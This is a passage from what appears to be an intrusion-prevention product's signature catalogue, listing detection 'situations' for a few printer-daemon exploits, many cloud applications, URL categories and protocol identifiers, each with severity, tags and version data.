About this situation: Attempt to exploit a buffer overflow in NIPrint LPD-LPR server
Context: TCP Printer Client Stream
Severity: 10
Tags: Windows, x86, Network Instruments NIPrint LPD-LPR Print Server, CVE2003, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: NIPrint-Lpd-Lpr-Server-BOF
Description:
Back to top

Printer_Sun-Solaris-Printd-File-Deletion

About this situation: File deletion attempt using vulnerability in the Sun Solaris printd daemon
Context: TCP Printer Client Stream
Severity: 7
Tags: Solaris, Any Hardware, CVE2005, Solaris not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-415-4219
Vulnerability: Printer-Sun-Solaris-Printd-File-Deletion
Description:
Back to top

Printer_Sun-Solaris-Printd-File-Deletion-2

About this situation: File deletion attempt using vulnerability in the Sun Solaris printd daemon
Context: TCP Printer Client Stream
Severity: 7
Tags: Solaris, Any Hardware, CVE2005, Solaris not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Printer-Sun-Solaris-Printd-File-Deletion
Description:
Back to top

Printout-Designer

About this situation: Application Printout-Designer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Printout Designer lets you to create personalized invoices, packing slips, labels and more, directly from your ecommerce platform.
Back to top

Private IP Addresses

About this situation: IP addresses defined in RFC 1918 document on Address Allocation for Private Intranets.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: IP addresses defined in RFC 1918 document on Address Allocation for Private Intranets.
Back to top

Private-Cloud-Application-Hosting

About this situation: Application Private-Cloud-Application-Hosting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PrivateCloudApplication outsourced application hosting suits businesses in need of a highly available, top performing hosting environment and is ideal for mission critical hosting.
Back to top

Privax

About this situation: privax usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web anonymity network, aimed at providing people to surf anonymously online; Source Privax
Back to top

Pro-Bono-Manager

About this situation: Application Pro-Bono-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pro Bono Net is a national nonprofit organization, work in close partnership with nonprofit legal organizations across the United States and Canada, to increase access to justice for the millions of poor people who face legal problems every year without help from a lawyer.
Back to top

Pro-Choice

About this situation: Sites that provide information about or are sponsored by organizations that support legal abortion or that offer support or encouragement to those seeking the procedure.
Context: URL Application Context
Severity: 1
Tags: Abortion, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or are sponsored by organizations that support legal abortion or that offer support or encouragement to those seeking the procedure.
Back to top

pro-HSE

About this situation: Application pro-HSE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: pro-HSE manages employee data like accident, incident, safety talk, risk assessment and compliance in database with web and desktop client access.
Back to top

Pro-Life

About this situation: Sites that provide information about or are sponsored by organizations that oppose legal abortion or that seek increased restriction of abortion.
Context: URL Application Context
Severity: 1
Tags: Abortion, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or are sponsored by organizations that oppose legal abortion or that seek increased restriction of abortion.
Back to top

Pro-Schedule

About this situation: Application Pro-Schedule detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CyberMatrix Pro Schedule Standard is multi-user appointment scheduling program.
Back to top

ProActivity-Suite

About this situation: Application ProActivity-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProActivity is a web-based software that utilizes applicability-based profiles to ensure local compliance while synchronizing global EHS programs.
Back to top

proALPHA

About this situation: Application proALPHA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: proALPHA is an business service provider. It is an ERP provider with a range of services such as the business solution and time comprehensive business services.
Back to top

Proboards

About this situation: Application Proboards detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProBoards allow build the discussion forum with forum hosting service.
Back to top

ProcessMAP

About this situation: Application ProcessMAP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProcessMAP provides environment, health, and safety management software ensures compliance, risk and performance.
Back to top

Proconnect

About this situation: Proconnect usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1098-5242
Description: Proconnect is an income tax software for managing individual or business returns.
Back to top

Procore

About this situation: Application Procore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Procore is a cloud-based construction management software application.
Back to top

Procurify

About this situation: Application Procurify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Procurify is a cloud purchasing solution. The web based software helps organizations streamline their internal purchasing process and improve cost management while reducing the dependency on paperwork. Procurify delivers a simple, affordable and well designed business software that can scale to meet your business needs.
Back to top

Product-Content-cloud

About this situation: Application Product-Content-cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Product Content cloud made for product data structuring and syndication. Retailers and distributors receive high-quality product information mapped to their needs as a result of data feed expertise.
Back to top

Product-Gree

About this situation: Application Product-Gree detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GREE is a global mobile social company with businesses that include gaming, commerce and lifestyle business community and media business, advertising, and investment.
Back to top

ProductCart

About this situation: Application ProductCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProductCart is an eCommerce shopping cart with smart marketing tools to help you grow online sales, and time-saving store management features.
Back to top

Producteev

About this situation: Application Producteev detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Producteev is task management software for teams.
Back to top

Productivity

About this situation: The parent category that contains the following categories: Advertisements, Application and Software Download, Instant Messaging, Message Boards and Forums, Online Brokerage and Trading and Pay-toSurf.
Context: URL Application Context
Severity: 1
Tags: Productivity, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Advertisements, Application and Software Download, Instant Messaging, Message Boards and Forums, Online Brokerage and Trading and Pay-toSurf.
Back to top

Profectus-Group

About this situation: Application Profectus-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Profectus Group is an international technology and services company that provides technologies for rebate and deal management, contract compliance and accounts payable audits.
Back to top

Professional and Worker Organizations

About this situation: Sites sponsored by or that support or offer information about organizations devoted to professional advancement or workers' interests.
Context: URL Application Context
Severity: 1
Tags: Social Organizations, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or that support or offer information about organizations devoted to professional advancement or workers' interests.
Back to top

Profileheaven

About this situation: Application Profileheaven detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Profileheaven.com is an online service that allows members to set up unique personal profiles and internal communication.
Back to top

Profliq

About this situation: Application Profliq detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prolifiq offers sales enablement tools and software so teams quickly create and disseminate consistent, compliant content through cloud-based collaboration.
Back to top

Progress-Energy

About this situation: Application Progress-Energy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Progress Energy natural gas development, building upon its history of performance excellence in North America to pioneer new infrastructure to deliver liquefied natural gas
Back to top

Progressive

About this situation: Application Progressive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Progressive Corporation is provider of car insurance in the United States.
Back to top

Project-Bubble

About this situation: Application Project-Bubble detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Project Bubble makes project management, collaboration and time tracking really easy
Back to top

Project-Drive

About this situation: Application Project-Drive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Project Drive is a web based project management software.
Back to top

Project-Management-Institute

About this situation: Application Project-Management-Institute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Project Management Institute is the membership association for the project management profession.
Back to top

Project-Manager

About this situation: Application Project-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online project management software for professionals. Project Manager.com gives you a project dashboard for planning, tracking and collaboration real-time.
Back to top

Project-Sales-Achiever

About this situation: Application Project-Sales-Achiever detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Project-SalesAchiever is a CRM software for the Construction Industry, is used by building products companies, construction companies and building contractors worldwide who have a need to win business through the building project route.
Back to top

ProjectBooks

About this situation: Application ProjectBooks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProjectBooks is a service for automated time tracking. ProjectBooks predicts on which projects employees spent their time by looking at data from tools and services that employees use during their workday, such as email, calendar, collaboration tools, technical software.
Back to top

ProjectionHub

About this situation: Application ProjectionHub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProjectionHub is a web application that helps entrepreneurs create financial projections without the need for a PhD in spreadsheet modeling.
Back to top

ProjectLocker

About this situation: Application ProjectLocker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProjectLocker provides software developers with the tools they need to deliver the highest quality software products.
Back to top

Projectmates

About this situation: Application Projectmates detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Projectmates Web Based online construction project management software is designed to simplify things, letting you keep track of tasks, handle changes, track budgets, and report progress with ease.
Back to top

Projectools

About this situation: Application Projectools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProjecTools is an integrated, real-time online project management platform featuring project management training, consulting and collaborative tools.
Back to top

Projector-PSA

About this situation: Application Projector-PSA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Projector PSA is a fully integrated suite of Professional Services Automation tools that helps services organizations with project management, resource scheduling, time and expense tracking, and client invoicing.
Back to top

Projectplace

About this situation: Projectplace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: The Projectplace software provides a suite of project management tools.No software installation is needed,clients pay to access Projectplace from a remote Website. Projectplace modules include Team conversations, Document Archive, Issue Management, Planning and Tracking, Meeting Management, Project Portal and Contacts.Source: Wikipedia
Back to top

ProjectPortfolioOffice

About this situation: Application ProjectPortfolioOffice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProjectPortfolioOffice is an online project portfolio management and collaboration application. It helps to plan, manage, collaborate, execute and report on projects, programs and portfolios.
Back to top

Projecturf

About this situation: Application Projecturf detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Projecturf is the straightforward and intricately-designed Web-based project management application that helps you manage projects, people, and tasks.
Back to top

prolinksolutions

About this situation: Application prolinksolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProLink create technology solutions in the financial services sector. The goal of ProLink software platform is to develop transparency across entire portfolios
Back to top

Promapp

About this situation: Application Promapp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Promapp is a BPM
Back to top

Promys

About this situation: Application Promys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Promys PSA Anywhere enables users to access any enterprise PSA functionality from any device, allows users to respond immediately to customers and collaborate in real-time with any department, whether they're in the office, or in the field.
Back to top

Pronto

About this situation: Application Pronto detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pronto Software provides businesses with a broad portfolio of software and services. Pronto integrated business solutions can help you maximise productivity, streamline your supply chain, and deliver a better service.
Back to top

ProntoForms

About this situation: Application ProntoForms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProntoForms is a mobile business solutions application, converting paper forms onto tablet or mobile device. ProntoForms allows to capture client signatures, payment info and photos.
Back to top

Proofhq

About this situation: ProofHQ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: ProofHQ is an online proofing tool that manages the review and approval process of creative content.
Back to top

Proofhub

About this situation: ProofHub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: ProofHub is a cloud based project management software and online team collaboration tool which helps you to manage, plan, organize and deliver projects.
Back to top

Proofpoint

About this situation: Application Proofpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Proofpoint provides cloud-based solutions for threat protection, compliance, governance, and secure communications.
Back to top

Propago

About this situation: Application Propago detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Propago provides powerful marketing portals ensuring any and all of your marketing materials are available to any and all of the people that need them, while giving you complete control over your brand, budget and inventory.
Back to top

Property-Matrix

About this situation: Application Property-Matrix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Property Matrix is a Property Management Software that combines enterprise class accounting with a stellar user experience.
Back to top

Property-Smart

About this situation: Application Property-Smart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SmartProperty.com is provider of software and services for reserve management in the community association marketplace.
Back to top

Propertybase

About this situation: Application Propertybase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Propertybase-The Estate Desktop, leveraging the Salesforce.com platform. It includes leads accounts, offers reservations, lease sale contracts, payments, real time web listings, and email marketing.
Back to top

Proposable

About this situation: Proposable usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: With the Proposable App you can create customized and branded proposals in a simple and quick way. Choose between a simple one page text quote and more complex quotes with multiple sections and rich multimedia such as video and audio files. The library includes sample templates that can be customized and saved. You can also create a library of all your favorite templates and sections of templates to be used in future proposals.
Back to top

Proposify

About this situation: Application Proposify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Proposify helps you write and design stunning proposal documents, collaborate with team members, and keep track of new business you pitch.
Back to top

ProProfs

About this situation: Application ProProfs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProProfs Survey Software offers features to online marketers, trainers, educational institutions corporations to create different kinds of surveys such as course evaluation surveys, market research surveys, product feedback surveys, learner feedback surveys and more.
Back to top

ProResponse

About this situation: Application ProResponse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProResponse is Customer Relationship Management
Back to top

Prospects

About this situation: Application Prospects detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prospects portfolio of graduate job and postgraduate study publications gives recruiters direct access to students and graduates on campus through unrivalled distribution via university careers services and graduate recruitment fairs.
Back to top

Prospera

About this situation: Application Prospera detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Prospera is online management tool that advises HR professionals on the core areas of their HR program. It is the only online service that integrates strategy with practical tools, enabling Human Resource Professionals to improve the way they manage people and contribute value to their organization.
Back to top

prospricing

About this situation: Application prospricing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PROS Holdings, Inc.
Back to top

Prostep

About this situation: Application Prostep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PROSTEP is a partner for manufacturers and suppliers in the automotive, aerospace, electronics, and other industries. PROSTEP strength lies in a combination of experience, process know-how and technical competence. PROSTEP worldclass business tools, together with our experienced employees, bring industry best practices that allow you to implement solutions tailored to your specific challenges. Engineering and manufacturing companies benefit from enhanced customer and supply chain collaboration.
Back to top

ProSys-SLM

About this situation: Application ProSys-SLM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProSys SLM is a scalable cloud-based process safety management solution with real-time KPI reports and inbuilt document management.
Back to top

ProSystem

About this situation: Application ProSystem detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProSystem a service provider in the health care industry we focus on the special needs of our clients and provide optimal solutions, include analysis, training, consulting services, and realization of projects.
Back to top

ProTasker

About this situation: Application ProTasker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ProTasker project management software is designed with all types of companies in mind - from one-person small businesses to medium-sized firms with a significant employee base.
Back to top

Proteum

About this situation: Application Proteum detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Proteum is an enterprise-focussed company providing software products and services for enterprises.
Back to top

Proto.io

About this situation: Application Proto.io detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Proto.io is a silly-fast way to create fully interactive mobile app prototypes.
Back to top

Protocol-Identification-Succeeded

About this situation: Protocol has been succesfully identified
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1210-5242
Description: Protocol Application has been identified.
Back to top

ProtoId_AMQP-Client

About this situation: AMQP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description:
Back to top

ProtoId_AMQP-Server

About this situation: AMQP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Description:
Back to top

ProtoId_ArcServe-Client

About this situation: ARCserve protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_ARCserve-Server

About this situation: ARCserve protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_CLDAP

About this situation: CLDAP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Description:
Back to top

ProtoId_Client-Not-FTP

About this situation: Client side protocol is not FTP.
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_Client-Not-SMTP

About this situation: Client side protocol is not SMTP.
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1139-5242
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_CVS-Client

About this situation: CVS protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_CVS-Server

About this situation: CVS protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_DHCP

About this situation: DHCP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

ProtoId_DHCP_Client-Stop

About this situation: Protocol identification completed for DHCP client
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_DNS

About this situation: DNS protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

ProtoId_DNS-TCP-Client

About this situation: DNS protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Description:
Back to top

ProtoId_DNS-TCP-Server

About this situation: DNS protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1149-5242
Description:
Back to top

ProtoId_DNSCurve

About this situation: DNSCurve Protocol detected.
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1104-5242
Description:
Back to top

ProtoId_Encrypted-Client

About this situation: Encrypted protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Description:
Back to top

ProtoId_Encrypted-Client-Stop

About this situation: Encrypted protocol search stopped
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Description:
Back to top

ProtoId_Encrypted-Server

About this situation: Encrypted protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Description:
Back to top

ProtoId_Encrypted-Server-Stop

About this situation: Encrypted protocol search stopped
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Description:
Back to top

ProtoId_ETHERNET_IP-TCP-Client

About this situation: ETHERNET/IP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Description:
Back to top

ProtoId_ETHERNET_IP-TCP-Server

About this situation: ETHERNET/IP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Description:
Back to top

ProtoId_ETHERNET_IP-UDP

About this situation: ETHERNET/IP protocol detected
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1120-5242
Last changed: sgpkg-ips-1120-5242
Description:
Back to top

ProtoId_FTP-Client

About this situation: FTP protocol detected
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_FTP-Server

About this situation: FTP protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_FTP_Server-Stop

About this situation: Protocol identification completed for FTP server
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-524-5211
Description:
Back to top

ProtoId_Generic-RPC-Server

About this situation: An RPC based protocol detected
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1409-5242
Last changed: sgpkg-ips-1409-5242
Description:
Back to top

ProtoId_gQUIC

About this situation: gQUIC protocol context
Context: ProtoId UDP Client Message
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Description:
Back to top

ProtoId_Ident-Client

About this situation: Ident protocol context
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_Ident-Client-Stop

About this situation: Ident Client stop condition
Context: ProtoId TCP Client Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Description:
Back to top

ProtoId_Ident-Server

About this situation: Ident protocol context
Context: ProtoId TCP Server Stream
Severity: 1
Tags: Protocol Identification, Content Identification
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-461-5211
Description:
Back to top

ProtoId_Ident-Server-Stop

About this situation: Ident Server stop condition
Context: ProtoId TCP Server Stream
